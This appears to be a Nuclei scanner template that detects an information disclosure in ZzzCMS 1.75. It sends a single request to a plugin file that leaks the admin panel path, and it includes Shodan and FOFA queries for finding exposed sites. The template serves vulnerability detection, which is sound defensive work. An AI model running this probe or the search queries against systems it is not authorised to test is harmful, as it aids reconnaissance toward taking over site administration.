nuclei-templates/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml

41 lines
1.2 KiB
YAML
Raw Normal View History

2023-08-07 17:56:29 +00:00
id: zzzcms-info-disclosure
info:
name: Zzzcms 1.75 - Information Disclosure
author: ritikchaddha
severity: low
description: |
There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore
reference:
- https://xz.aliyun.com/t/7414
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-08-07 17:56:29 +00:00
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
tags: zzzcms,info,disclosure
http:
- raw:
- |
GET /plugins/webuploader/js/webconfig.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var adminpath'
- 'var imageMaxSize='
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502202a3a4916c5fadccff982078fec5a98de45b89076f013e080cad56b7f25fd7327022100bc6f7789895c6bb952913f2990bb4214961e49148417b7b16e969c14585ea09d:922c64590222798bb761d5b6d8e72950